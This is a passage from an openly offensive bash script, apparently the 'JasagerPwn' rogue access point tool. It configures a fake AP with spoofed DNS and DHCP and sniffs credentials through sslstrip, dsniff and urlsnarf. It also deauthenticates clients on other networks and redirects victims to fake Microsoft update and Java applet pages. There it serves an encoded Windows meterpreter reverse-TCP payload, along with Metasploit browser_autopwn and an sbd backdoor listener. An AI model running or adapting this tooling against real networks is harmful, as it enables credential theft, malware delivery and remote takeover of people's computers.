echo -e "\e[01;31m[!]\e[00m ERROR: Cant Find Airdrop-ng Installer.. Do it manually." fi fi #metasploit check if [ ! -e "$msfpath/msfconsole" ]; then echo && echo -e "\e[01;31m[!]\e[00m ERROR: Metasploit wasnt found in: "$msfpath"" && echo && cleanup; fi #SET check if [ ! -e "$SETpath/set-automate" ]; then echo && echo -e "\e[01;31m[!]\e[00m ERROR: Social Engineering Toolkit wasnt found in: "$SETpath"" && echo && cleanup else # python pefile module - thanks redmeat_uk if [ ! -e "$SETpath/src/payloadgen/pefile.py" ]; then echo -e "\e[01;31m[!]\e[00m No Python PEfile module was detected... Installing.." if [ -e "/tmp/pefile-1.2.10-102.tar.gz" ]; then rm -rf /tmp/pefile-1.2.10-102* ; fi wget -q -P "/tmp" http://pefile.googlecode.com/files/pefile-1.2.10-102.tar.gz tar xf /tmp/pefile-1.2.10-102.tar.gz -C /tmp/ mv /tmp/pefile-1.2.10-102/pefile.py $SETpath/src/payloadgen/ chmod +x $SETpath/src/payloadgen/pefile.py if [ -e "$SETpath/src/payloadgen/pefile.py" ]; then echo -e "\e[01;31m[!]\e[00m Installation Complete!" elif [ ! -e "$SETpath/src/payloadgen/pefile.py" ]; then echo -e "\e[01;31m[!]\e[00m Installation Failed!" fi if [ -d "/tmp/pefile-1.2.10-102/" ]; then rm -rf /tmp/pefile-1.2.10-102/ ; fi fi fi #put up monitor interfaces #loopbreak=`ifconfig | grep mon4 | awk '{print $1}' | cut -b 4` monAttempts="0" while [ ! $moncheck ]; do if [ $monAttempts -ge "3" ]; then echo -e "\e[01;31m[!]\e[00m FATAL: Couldn't Start $MIFACE" && cleanup; fi #if [ ! $loopbreak ]; then sleep 1; else break; fi #ATKcheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4` moncheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4` xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Start $MIFACE" -e "airmon-ng start $WIFACE" moncheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4` #ATKcheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4` monAttempts=$(($monAttempts+1)) done #copy over DNS compatable persistence script if [ ! -e "$msfpath/scripts/meterpreter/persistence_dns.rb" ]; then cp src/persistence_dns.rb "$msfpath/scripts/meterpreter/" ; fi #cleanup www folders if [ -d "$Gwww/" ] ; then rm -rf $Gwww/ ; fi if [ -d "$Jwww/" ] ; then rm -rf $Jwww/ ; fi if [ -d "$Fwww/" ] ; then rm -rf $Fwww/ ; fi sleep 1 #patience if [ ! -d "$Jwww" ]; then mkdir $Jwww/ ; fi if [ ! -d "$Fwww" ]; then mkdir $Fwww/ ; fi if [ ! -d "$Gwww" ]; then mkdir $Gwww/ ; fi if [ ! -d "/tmp/collected" ]; then mkdir /tmp/collected/ ; fi #backup old default index.html if [ -e /var/www/index.htm ]; then mv /var/www/index.htm /var/www/index.htm.OLD elif [ -e /var/www/index.html ]; then mv /var/www/index.html /var/www/index.html.OLD fi #fake update page if [ -d "$Fwww/" ] ; then cp -rf src/wwwFakeupdate/* $Fwww/ fi # google page cp -rf src/wwwGoogle/* $Gwww/ # java required page cp -rf src/wwwJava/* $Jwww/ if [ ! $googleRev ]; then echo -n elif [ $googleRev -gt $rev ]; then echo echo -e "\e[01;31m[!]\e[00m UPDATE: There is an update available!!! Run ./jasagerPwn -u" echo fi echo -e "\e[01;32m[>]\e[00m Creating scripts..." #Dynamic varaibles incase SET changes, which it does and will. SETapache=`cat $SETpath/config/set_config | grep -n "APACHE_SERVER" | awk -F: '{print $1}'` SETapacheDIR=`cat $SETpath/config/set_config | grep -n "APACHE_DIRECT" | awk -F: '{print $1}'` SETredirect=`cat $SETpath/config/set_config | grep -n "AUTO_REDIRECT" | awk -F: '{print $1}'` SETmetscript=`cat $SETpath/config/set_config | grep -n "METERPRETER_MULTI_SCRIPT" | awk -F: '{print $1}'` SETrepeater=`cat $SETpath/config/set_config | grep -n "JAVA_REPEATER=OFF" | awk -F: '{print $1}'` #SET_CONFIG Text Parsing Variables - for javapwn APACHESVR=`cat $SETpath/config/set_config | grep "APACHE_SERVER=ON"` APACHEDIR=`cat $SETpath/config/set_config | grep "/var/www/javapwn"` meterpreterS=`cat $SETpath/config/set_config | grep "METERPRETER_MULTI_SCRIPT=ON"` AREDIRECT=`cat $SETpath/config/set_config | grep "AUTO_REDIRECT=OFF"` JREPEATER=`cat $SETpath/config/set_config | grep "JAVA_REPEATER=ON"` #backup orignal SET config if [ ! -e "$SETpath/config/set_config.ORIGINAL" ]; then cp -f $SETpath/config/set_config $SETpath/config/set_config.ORIGINAL fi #Customize SET config to how we want it.. if [ ! "$APACHESVR" ]; then sed ''${SETapache}'s!APACHE_SERVER=OFF!APACHE_SERVER=ON!g' $SETpath/config/set_config > $SETpath/config/set_config2 # > $SETpath/config/set_configTMP && mv set_configTMP set_config elif [ "$APACHESVR" ]; then mv $SETpath/config/set_config $SETpath/config/set_config2 fi sleep 2 if [ ! "$APACHEDIR" ]; then sed ''${SETapacheDIR}'s!APACHE_DIRECTORY=/var/www!APACHE_DIRECTORY=/var/www/google!g' $SETpath/config/set_config2 > $SETpath/config/set_config3 # > $SEETpath/config/set_configTMP && mv set_configTMP set_config #mv $SETpath/config/set_config $SETpath/config/set_config.leg3nd elif [ "$APACHEDIR" ]; then mv $SETpath/config/set_config2 $SETpath/config/set_config3 fi sleep 2 if [ ! "${AREDIRECT}" ]; then sed ''${SETredirect}'s!AUTO_REDIRECT=ON!AUTO_REDIRECT=OFF!g' $SETpath/config/set_config3 > $SETpath/config/set_config4 # > $SETpath/config/set_configTMP && mv set_configTMP set_config elif [ ! "$AREDIRECT" ]; then mv $SETpath/config/set_config3 $SETpath/config/set_config4 fi sleep 2 if [ ! "${JREPEATER}" ]; then sed ''${SETrepeater}'s!JAVA_REPEATER=OFF!JAVA_REPEATER=ON!g' $SETpath/config/set_config4 > $SETpath/config/set_config5 # > $SETpath/config/set_configTMP && mv set_configTMP set_config elif [ "$JREPEATER" ]; then mv $SETpath/config/set_config4 $SETpath/config/set_config5 fi sleep 2 if [ "$autoMetScript" -eq "1" ] && [ ! "$JREPEATER" ]; then #edit for meterpreter script mode # if [ ! "$meterpreterS" ]; then sed ''${SETmetscript}'s!METERPRETER_MULTI_SCRIPT=OFF!METERPRETER_MULTI_SCRIPT=ON!g' $SETpath/config/set_config5 > $SETpath/config/set_config6 # > $SETpath/config/set_configTMP && mv set_configTMP set_config # fi elif [ "$autoMetScript" -eq "1" ] && [ "$JREPEATER" ]; then sed ''${SETmetscript}'s!METERPRETER_MULTI_SCRIPT=OFF!METERPRETER_MULTI_SCRIPT=ON!g' $SETpath/config/set_config4 > $SETpath/config/set_config5 fi sleep 2 #move config to right spot if [ -e "$SETpath/config/set_config6" ]; then mv $SETpath/config/set_config6 $SETpath/config/set_config fi if [ "$autoMetScript" -eq "0" ] && [ -e "$SETpath/config/set_config5" ] ; then mv $SETpath/config/set_config5 $SETpath/config/set_config elif [ "$autoMetScript" -eq "1" ] && [ -e "$SETpath/config/set_config5" ] ; then mv $SETpath/config/set_config5 $SETpath/config/set_config elif [ "$autoMetScript" -eq "1" ] && [ -e "$SETpath/config/set_config6" ] ; then mv $SETpath/config/set_config6 $SETpath/config/set_config fi sleep 3 #make sure we clean up if [ -e "$SETpath/config/set_config2" ]; then rm $SETpath/config/set_config2 ; fi if [ -e "$SETpath/config/set_config3" ]; then rm $SETpath/config/set_config3 ; fi if [ -e "$SETpath/config/set_config4" ]; then rm $SETpath/config/set_config4 ; fi if [ -e "$SETpath/config/set_config5" ]; then rm $SETpath/config/set_config5 ; fi if [ -e "$SETpath/config/set_config6" ]; then rm $SETpath/config/set_config6 ; fi #Make loop script to isnure our DNS and IP cp /etc/resolv.conf /etc/resolv.conf.ORIGINAL echo "while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done &" > /tmp/resolv.sh chmod +x /tmp/resolv.sh xterm -geometry 0x0+0+0 -e "bash /tmp/resolv.sh" & dnsID2=`echo $!` #Background loop to parse SSLstrip logins #while true; do SSLparse && sleep 5 ; done & #parseID=`echo $!` #DHCP CONF if [ -e "/etc/dhcp3/dhcpd.conf" ]; then mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.ORIGINAL ; fi if [ -e "/tmp/dhcpd.conf" ]; then rm /tmp/dhcpd.conf; fi echo -e "#fakeAP.dhcp ddns-update-style none; one-lease-per-client false; authoritative; ignore client-updates; # Ignore all client requests for DDNS update default-lease-time 60; # 24 hours=86400 max-lease-time 72; # 48 hours=172800 log-facility local7;\n subnet 192.168.10.0 netmask 255.255.255.0 { interface $FONIFACE; range 192.168.10.3 192.168.10.250; option routers 192.168.10.2; option subnet-mask 255.255.255.0; option broadcast-address 192.168.10.255; option domain-name-servers 192.168.10.2; option domain-name \"$DomainName\"; allow unknown-clients; }" >> /etc/dhcp3/dhcpd.conf #backup original SET templates if [ -e "$SETpath/src/html/templates/java/index.template" ]; then mv "$SETpath/src/html/templates/java/index.template" "$SETpath/src/html/templates/java/index.template.ORIGINAL" cp -rf src/wwwJava/* $SETpath/src/html/templates/java/ else cp -rf src/wwwJava/* $SETpath/src/html/templates/java/ fi if [ -e "$SETpath/src/html/templates/google/index.template" ]; then mv "$SETpath/src/html/templates/google/index.template" "$SETpath/src/html/templates/google/index.template.ORIGINAL" cp -rf src/wwwGoogle/* $SETpath/src/html/templates/google/ else cp -rf src/wwwGoogle/* $SETpath/src/html/templates/google/ fi #Airdrop-ng Deauther CONF #ourAPmac=`macchanger -s $MIFACE | awk '{ print $3 }' | tr '[a-z]' '[A-Z]'` if [ -e "/tmp/deauth.conf" ] ; then rm "/tmp/deauth.conf" ; fi echo "# Jasager - deauth.conf v$version a/$ourAPmac|any a/00:00:00:00:00:00|any d/any|any" > /tmp/deauth.conf #Add our wifi gateway if needed wifiMAC=`ifconfig $IFACE | grep "HWaddr" | awk '{print $5}' | tr "[a-z]" "[A-Z]"` if [ $WiFiMODE -eq "1" ]; then newIFACEmac=`iwconfig $IFACE | grep "Access Point" | awk '{print $6}'` echo "a/$newIFACEmac|$wifiMAC" >> /tmp/deauth.conf #elif [ ! $wifiMAC ] || [ ! $newIFACEmac ]; then #echo #echo -e "\e[01;31m[!]\e[00m Error: Your Wireless Connection Has no MAC Address.." #echo fi #Host file - MITM WEBSITE if test -e /tmp/BP.dns; then rm /tmp/BP.dns; fi echo "$fonIP *" > /tmp/BP.dns #Vhosts javapwn vhost="/etc/apache2/sites-available/javapwn" if [ -e "$vhost" ] ; then rm "$vhost"; fi echo "<VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot $Jwww <Directory /> Options FollowSymLinks AllowOverride None </Directory> <Directory $Jwww> Options Indexes FollowSymLinks MultiViews AllowOverride None Order allow,deny allow from all </Directory> ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/ <Directory "/usr/lib/cgi-bin"> AllowOverride None Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch Order allow,deny Allow from all </Directory> ErrorLog /var/log/apache2/error.log # Possible values include: debug, info, notice, warn, error, crit, # alert, emerg. LogLevel warn CustomLog /var/log/apache2/access.log combined Alias /doc/ "/usr/share/doc/" <Directory "/usr/share/doc/"> Options Indexes MultiViews FollowSymLinks AllowOverride None Order deny,allow Deny from all Allow from 127.0.0.0/255.0.0.0 ::1/128 </Directory> ErrorDocument 403 /index.html ErrorDocument 404 /index.html </VirtualHost>" >> $vhost #Vhosts google vhost2="/etc/apache2/sites-available/google" if [ -e "$vhost2" ] ; then rm "$vhost2"; fi echo "<VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot $Gwww <Directory /> Options FollowSymLinks AllowOverride None </Directory> <Directory $Gwww> Options Indexes FollowSymLinks MultiViews AllowOverride None Order allow,deny allow from all </Directory> ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/ <Directory "/usr/lib/cgi-bin"> AllowOverride None Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch Order allow,deny Allow from all </Directory> ErrorLog /var/log/apache2/error.log # Possible values include: debug, info, notice, warn, error, crit, # alert, emerg. LogLevel warn CustomLog /var/log/apache2/access.log combined Alias /doc/ "/usr/share/doc/" <Directory "/usr/share/doc/"> Options Indexes MultiViews FollowSymLinks AllowOverride None Order deny,allow Deny from all Allow from 127.0.0.0/255.0.0.0 ::1/128 </Directory> ErrorDocument 403 /index.html ErrorDocument 404 /index.html </VirtualHost>" >> $vhost2 #Vhosts fakeupdate vhost3="/etc/apache2/sites-available/fakeupdate" if [ -e "$vhost3" ] ; then rm "$vhost3"; fi echo "<VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot $Fwww <Directory /> Options FollowSymLinks AllowOverride None </Directory> <Directory $Fwww> Options Indexes FollowSymLinks MultiViews AllowOverride None Order allow,deny allow from all </Directory> ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/ <Directory "/usr/lib/cgi-bin"> AllowOverride None Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch Order allow,deny Allow from all </Directory> ErrorLog /var/log/apache2/error.log # Possible values include: debug, info, notice, warn, error, crit, # alert, emerg. LogLevel warn CustomLog /var/log/apache2/access.log combined Alias /doc/ "/usr/share/doc/" <Directory "/usr/share/doc/"> Options Indexes MultiViews FollowSymLinks AllowOverride None Order deny,allow Deny from all Allow from 127.0.0.0/255.0.0.0 ::1/128 </Directory> ErrorDocument 403 /index.php ErrorDocument 404 /index.php </VirtualHost>" >> $vhost3 #SET automate scripts, can be TOUCHY. #run as template rather then imported if [ -e "/tmp/auto-java2" ] ; then rm "/tmp/auto-java2" ; fi echo -e "\n2\n1\n1\n1\n2\n16" > /tmp/auto-java2 # echo -e "2 # 1 # 1 # 1 # 2 # 16" > /tmp/auto-java2 #run as template rather then imported if [ -e "/tmp/auto-google2" ] ; then rm "/tmp/auto-google2" ; fi echo -e "\n2\n1\n1\n3\n2\n16" > /tmp/auto-google2 # echo -e "2 # 1 # 1 # 3 # 2 # 16" > /tmp/auto-google2 #DIFFERENT METHOD OF USING THE TEMPLATES. #fancy clone of java DL website - not used # if [ -e "/tmp/auto-java" ] ; then rm "/tmp/auto-java" ; fi # echo -e "2 # 1 # 3 # $pwd/src/wwwJava/ # 2 # 16" > /tmp/auto-java #fancy clone of google - not used # if [ -e "/tmp/auto-google" ] ; then rm "/tmp/auto-google" ; fi # echo -e "2 # 1 # 3 # $pwd/src/wwwGoogle/ # 2 # 16" > /tmp/auto-google if [ $autoMetScript -eq 1 ]; then metScript #Metasploit rc w/ auto script if [ -e "/tmp/msfrc" ] ; then rm "/tmp/msfrc" ; fi echo -e "use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST $ourIP set ExitOnSession false set InitialAutorunScript multiscript -rc /pentest/exploits/SET/src/program_junk/multi_meter.file exploit -j" > /tmp/msfrc #Metasploit rc w/ auto script BP if [ -e "/tmp/msfrcBP" ] ; then rm "/tmp/msfrcBP" ; fi echo -e "use auxiliary/server/browser_autopwn set PAYLOAD windows/meterpreter/reverse_tcp set LHOST $ourIP set SRVPORT 80 set SRVHOST $ourIP set URIPATH / set ExitOnSession false set InitialAutorunScript multiscript -rc /pentest/exploits/SET/src/program_junk/multi_meter.file run -j" > /tmp/msfrcBP elif [ $autoMetScript -eq 0 ]; then #Metasploit rc no auto script if [ -e "/tmp/msfrc" ] ; then rm "/tmp/msfrc" ; fi echo -e "use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST $ourIP set ExitOnSession false exploit -j" > /tmp/msfrc #Metasploit rc no auto script BP if [ -e "/tmp/msfrcBP" ] ; then rm "/tmp/msfrcBP" ; fi echo -e "use auxiliary/server/browser_autopwn set PAYLOAD windows/meterpreter/reverse_tcp set LHOST $ourIP set SRVPORT 80 set SRVHOST $ourIP set URIPATH / set ExitOnSession false run -j" > /tmp/msfrcBP fi sleep 1 #USING DNS VIA IPTABLES TO GATEWAY #echo -e "\e[01;32m[>]\e[00m Starting DNS services..." #xterm -geometry 75x5+0+94 -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" & #xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" & #xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - Tunnel DNS" -e "while true; do sleep 60 && echo 'Tunneling $ourIP DNS Requests through $gatewayIP...';done" & #xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - DNS" -e "dnsmasq -C /tmp/Jasager.dnsmasq" & #DNSID=`echo $!` echo -e "\e[01;32m[>]\e[00m Enabling ipv4 Forwarding..." xterm -geometry 0x0+0+0 -e "modprobe tun" & echo "1" > /proc/sys/net/ipv4/ip_forward #tail messages for DHCP info xterm -geometry 75x16+0+509 -bg black -fg red -T "[JasagerPwn-DHCP] v$version" -e "tail -f /var/log/messages | grep DHCP" & messageID=`echo $!` echo -e "\e[01;32m[>]\e[00m Starting up DHCP3..." xterm -geometry 75x9+0+474 -bg black -fg green -T "Starting DHCP3 Server" -e "/etc/init.d/dhcp3-server start" & echo -e "\e[01;32m[>]\e[00m Loading URL Snarf/Driftnet..." xterm -geometry 0x0+0+0 -e "driftnet -v -s -i $FONIFACE" & xterm -geometry 75x24+464+405 -bg black -fg green -T "[JasagerPwn-DSniff] v$version" -e "dsniff -i $FONIFACE" & dsniffID=`echo $!` xterm -geometry 75x37+0+0 -bg black -fg green -T "[JasagerPwn-URLSnarf] v$version" -e "urlsnarf -i $FONIFACE" & echo -e "\e[01;32m[>]\e[00m Setting up IP Tables..." IPTABLES echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version Started! More @ www.info-s3curity.com" echo #MAIN OPTIONS FOR AP ATTACKS while true do echo echo echo ifconfig $FONIFACE $fonIP echo -e "\e[01;31m[+][-----------------------------------------------------------------][+]\e[00m" echo -e "\e[01;31m[+][==========================-Main Menu-============================][+]\e[00m" echo -e "\e[01;31m[+][-----------------------------------------------------------------][+]\e[00m" #echo -e "\e[01;32m[!]\e[00m Press [S]niff, [F]akeUpdate, [D]eAuth, [B]rowserPwn, [J]ava Attack, e[X]it " if [ $sniffing -eq 0 ] && [ $browserpwn -eq 0 ] && [ $fakeupdate -eq 0 ] && [ $javaATK -eq 0 ]; then echo -e "\e[01;36m [*] Attack Status: Idle..\e[00m" elif [ $sniffing -eq 1 ]; then echo -e "\e[01;31m [*] Attack Status: SSLstrip & Sniffing\e[00m" elif [ $browserpwn -eq 1 ]; then echo -e "\e[01;31m [*] Attack Status: MSF Browser-AutoPwn\e[00m" elif [ $fakeupdate -eq 1 ]; then echo -e "\e[01;31m [*] Attack Status: MSF Fake Update\e[00m" elif [ $javaATK -eq 1 ]; then echo -e "\e[01;31m [*] Attack Status: SET Java Applet\e[00m" fi echo -e "\e[01;32m[-]\e[00m [1][S] = Sniff The APs Network." echo -e "\e[01;32m[-]\e[00m [2][F] = Redirect LAN to Fake Microsoft Update Page. (MS Only)" echo -e "\e[01;32m[-]\e[00m [3][B] = Redirect LAN to Metasploit BrowserAutopwn. (Any OS)" echo -e "\e[01;32m[-]\e[00m [4][J] = Redirect LAN to Java Applet Page. (Any OS) " echo -e "\e[01;32m[-]\e[00m [5][D] = De-Authorize Clients on other APs." echo -e "\e[01;32m[-]\e[00m [6][N] = Adjust Network and Internet Settings" echo -e "\e[01;32m[-]\e[00m [7][X] = Exit Jasager Script" echo -n -e "\e[01;31m [?] Choose an attack for AP:\e[00m " read -e CONFIRM3 echo case $CONFIRM3 in s|S|sniff|Sniff|1) if [ $browserpwn -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Cant run with browserPwn. IPtables Conflict." elif [ $javaATK -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Cant run with Java Applet Attack. IPtables Conflict." elif [ $fakeupdate -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Cant run with FakeUpdate. IPtables Conflict." elif [ $sniffing -eq 0 ]; then iptables -t nat -A PREROUTING --in-interface $FONIFACE -p tcp --destination-port 80 -j REDIRECT --to-ports $sslport xterm -geometry 75x3+1-25 -bg black -fg green -e "sslstrip -l $sslport && sleep 3" & if [ -e sslstrip.log ]; then xterm -geometry 75x24+464+65 -bg black -fg green -T "SSLStrip Sniffing" -e "tail -f sslstrip.log" & TAILPID=`echo $!` else touch sslstrip.log xterm -geometry 75x24+464+65 -bg black -fg green -T "SSLStrip Sniffing" -e "tail -f sslstrip.log" & TAILPID=`echo $!` fi echo -e "\e[01;33m[!]\e[00m\e[00m Attack Started: SSLStripping / Sniffing" wasSniffing="1" sniffing="1" elif [ $sniffing -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Your Already Sniffing!!" fi #xterm -geometry 75x20+464+288 -bg black -fg green -e "dsniff -i $FONIFACE" & ;; J|j|java|Java|4) if [ $browserpwn -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Cant run with browserPwn. Port Conflict." elif [ $fakeupdate -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Cant run with FakeUpdate. Port Conflict." elif [ $javaATK -eq 0 ]; then echo -n -e "\e[01;33m[!]\e[00m [1][G]oogle or [2][J]ava Required: " read -e JavaSite case $JavaSite in G|g|Google|google|1) if [ $autoMetScript -eq 1 ]; then metScript; fi javasite="1" JavaSite xterm -geometry 75x8+100+0 -fg green -bg black -T "v$version - Starting Apache2" -e "/etc/init.d/apache2 restart" xterm -geometry 75x8+100+0 -fg green -bg black -T "v$version - Starting Apache2" -e "ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite google && /etc/init.d/apache2 reload" xterm -fg green -bg black -geometry 110x42+464-38 -T "[SET-JavaApplet] v$version - WebServer" -e "cd $SETpath && ./set-automate /tmp/auto-google2" & ;; J|j|Java|java|2) if [ $autoMetScript -eq 1 ]; then metScript; fi javasite="2" && sleep 1 JavaSite xterm -geometry 75x8+100+0 -bg black -fg green -T "v$version - Starting Apache2" -e "/etc/init.d/apache2 restart" xterm -geometry 75x8+100+0 -bg black -fg green -T "v$version - Starting Apache2" -e "ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite javapwn && /etc/init.d/apache2 reload" xterm -fg green -bg black -geometry 110x42+464-38 -T "[SET-JavaApplet] v$version - WebServer" -e "cd $SETpath && ./set-automate /tmp/auto-java2" & ;; *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.." esac echo -n -e "\e[01;34m[*]\e[00m Press [ENTER] when SET is ready.." read -e $blahblahblah ipTableRedirect if [ $autoMetScript -eq 1 ]; then metScript; fi echo -e "\e[01;33m[!]\e[00m Forcing LAN to visit our site..." #iptables -t nat -A PREROUTING --in-interface $FONIFACE -p udp -j DNAT --to $ourIP #iptables --table nat --append PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $ourIP #iptables --table nat --append PREROUTING --in-interface $FONIFACE --jump REDIRECT #iptables --table nat --append PREROUTING --in-interface $FONIFACE #Check for bad index.html.. whys it index2.html? lolwtf if [ -e "$SETpath/src/web_clone/site/template/index2.html" ] && [ ! -e "$SETpath/src/web_clone/site/template/index.html" ]; then mv "$SETpath/src/web_clone/site/template/index2.html" "$SETpath/src/web_clone/site/template/index.html" fi if [ -e "/var/www/javapwn/index2.html" ] && [ ! -e "/var/www/javapwn/index.html" ]; then mv "/var/www/javapwn/index2.html" "/var/www/javapwn/index.html" fi xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-Kill DNS] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" & sleep 2 xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-DNS Spoof] v$version - DNSSpoof" -e "dnsspoof -i $FONIFACE -f /tmp/BP.dns" & javaATK="1" fi while true do if [ $browserpwn -eq 1 ]; then break; fi if [ $fakeupdate -eq 1 ]; then break; fi #echo -n "[?] Enter [I] to give Internet back or [M] for Main Menu: " #read -e $CONFIRM7 echo echo -e "\e[01;33m[MODE][==========-Java Applet Attack SET-==========][!]\e[00m" echo -e -n "\e[01;33m[!]\e[00m [S][1] to Stop Attack or [M][2] for Main Menu: " read -e USR_CHOICE9 #read -r -p "[?] Enter [I] to give Internet back or [M] for Main Menu: " USR_CHOICE9 case $USR_CHOICE9 in S|s|Stop|stop|1) xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE" & xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --jump REDIRECT" & xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $fonIP" & IPTABLES xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" & xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version - Stopping Apache2" -e "/etc/init.d/apache2 stop" & javaATK="0" sleep 3 #xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" & if [ $wasSniffing != "0" ]; then sslstrip fi echo -e "\e[01;33m[!]\e[00m DONT FORGET TO RUN 'ipconfig /flushdns' ON VICTIM!!" break ;; M|m|Menu|menu|2) break ;; *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.." esac done ;; F|f|fakeupdate|Fakeupdate|2) if [ $browserpwn -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Cant run with browserPwn. Port Conflict." elif [ $javaATK -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Cant run with Java Applet Attack. IPtables Conflict." elif [ $fakeupdate -eq 0 ]; then if [ $autoMetScript -eq 1 ]; then metScript; fi echo -e "\e[01;33m[!]\e[00m Creating Exploit (Windows)..." xterm -geometry 75x15+10+0 -bg black -fg green -T "[Metasploit Payload] v$version - Metasploit (Windows)" -e "msfpayload windows/meterpreter/reverse_tcp LHOST=$ourIP R | msfencode -x $Fwww/sbd.exe -t exe -e x86/shikata_ga_nai -c 10 -o $Fwww/Windows-KB183905-x86-ENU.exe" echo -e "\e[01;33m[!]\e[00m Forcing LAN to visit our site..." ipTableRedirect #iptables -t nat -A PREROUTING --in-interface $FONIFACE -p udp -j DNAT --to $ourIP #iptables --table nat --append PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $ourIP #iptables --table nat --append PREROUTING --in-interface $FONIFACE --jump REDIRECT #iptables --table nat --append PREROUTING --in-interface $FONIFACE #xterm -geometry 110x42+464-38 -bg black -fg green -T "[MFU Handler] v$version - Metasploit" -e "msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$ourIP E" & xterm -geometry 110x42+464-38 -bg black -fg green -T "[Metasploit Handler] v$version - Metasploit" -e "msfconsole -r /tmp/msfrc" & echo -e "\e[01;33m[!]\e[00m Getting the backdoor (SBD) ready..." xterm -geometry 75x22+10+450 -bg black -fg green -T "[JasagerPwn-SBD] v$version - SBD" -e "sbd -l -k leg3nd -p $port" & xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" & sleep 3 xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-DNS Spoof] v$version - DNSSpoof" -e "dnsspoof -i $FONIFACE -f /tmp/BP.dns" & fakeupdate="1" echo -e "\e[01;32m[>]\e[00m Starting Web Server @ $ourIP:80..." xterm -geometry 75x8+100+0 -T "v$version - Starting Apache2" -e "/etc/init.d/apache2 restart" xterm -geometry 75x8+100+0 -T "v$version - Starting Apache2" -e "ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite fakeupdate && a2enmod php5 && /etc/init.d/apache2 reload" fi while true do if [ $browserpwn -eq 1 ]; then break; fi if [ $javaATK -eq 1 ]; then break; fi #echo -n "[?] Enter [I] to give Internet back or [M] for Main Menu: " #read -e $CONFIRM7 echo echo -e "\e[01;33m[MODE][==========-FakeUpdate Metasploit-==========][!]\e[00m" #read -r -p "[?] Enter [I] to give Internet back or [M] for Main Menu: " USR_CHOICE1 echo -e -n "\e[01;33m[!]\e[00m [S][1] to Stop Attack or [M][2] for Main Menu: " read -e USR_CHOICE1 case $USR_CHOICE1 in S|s|Stop|stop|1) xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE" & xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --jump REDIRECT" & xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $fonIP" & IPTABLES xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version" -e "killall -9 dnsspoof" & xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version" -e "/etc/init.d/apache2 stop" & fakeupdate="0" sleep 3 #xterm -geometry 75x5+0+94 -bg black -fg green -T 